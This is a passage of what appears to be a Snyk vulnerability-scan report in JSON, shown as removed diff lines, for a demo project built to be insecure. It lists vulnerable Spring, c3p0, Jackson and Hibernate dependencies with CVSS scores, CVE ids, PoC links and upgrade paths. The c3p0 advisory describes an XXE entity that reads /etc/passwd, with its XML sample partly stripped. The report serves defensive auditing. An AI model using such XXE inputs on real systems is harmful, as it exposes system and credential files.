"2024-03-06T13:56:21.626910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", - "epssDetails": { - "percentile": "0.75300", - "probability": "0.00449", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22970" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-05-12T08:45:35.744127Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-12T08:17:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-05-12T09:49:10.833602Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:48.407397Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "title": "Improper Handling of Case Sensitivity", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.2.21)", - "[5.3.0, 5.3.19)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "5.2.21", - "5.3.19" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-context", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28333", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/MarcinGadz/spring-rce-poc", - "title": "PoC" - }, - { - "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", - "title": "Spring Blog Post" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22968", - "title": "Tanzu Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.233852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", - "epssDetails": { - "percentile": "0.29205", - "probability": "0.00065", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22968" - ], - "CWE": [ - "CWE-178" - ] - }, - "packageName": "org.springframework:spring-context", - "proprietary": false, - "creationTime": "2022-04-14T11:54:10.207823Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-14T11:43:54Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-context" - }, - "publicationTime": "2022-04-14T12:09:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:16.458425Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.springframework:spring-context", - "version": "3.2.6.RELEASE", - "severityWithCritical": "low" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[3.0.1.GA, 3.1.2.GA)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.jboss.logging:jboss-logging", - "creationTime": "2024-06-18T02:47:02.411Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:47:02.411Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.jboss.logging:jboss-logging@3.1.0.CR2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.jboss.logging:jboss-logging", - "version": "3.1.0.CR2", - "severityWithCritical": "medium" - } - ], - "upgrade": { - "com.fasterxml.jackson.core:jackson-core@2.6.5": { - "upgradeTo": "com.fasterxml.jackson.core:jackson-core@2.8.6", - "upgrades": [ - "com.fasterxml.jackson.core:jackson-core@2.6.5", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "vulns": [ - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520" - ] - }, - "com.fasterxml.jackson.core:jackson-databind@2.6.5": { - "upgradeTo": "com.fasterxml.jackson.core:jackson-databind@2.12.7.1", - "upgrades": [ - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "vulns": [ - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573" - ] - }, - "commons-collections:commons-collections@3.1": { - "upgradeTo": "commons-collections:commons-collections@3.2.2", - "upgrades": [ - "commons-collections:commons-collections@3.1", - "commons-collections:commons-collections@3.1", - "commons-collections:commons-collections@3.1" - ], - "vulns": [ - "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "SNYK-JAVA-COMMONSCOLLECTIONS-6056408" - ] - }, - "org.hibernate:hibernate-validator@4.3.1.Final": { - "upgradeTo": "org.hibernate:hibernate-validator@6.0.23.Final", - "upgrades": [ - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "vulns": [ - "SNYK-JAVA-ORGHIBERNATE-30098", - "SNYK-JAVA-ORGHIBERNATE-568162", - "SNYK-JAVA-ORGHIBERNATE-569100" - ] - } - }, - "patch": {}, - "ignore": {}, - "pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 99, - "projectName": "io.github.snyk:todolist-web-common", - "foundProjectCount": 7, - "displayTargetFile": "todolist-goof/todolist-web-common/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - 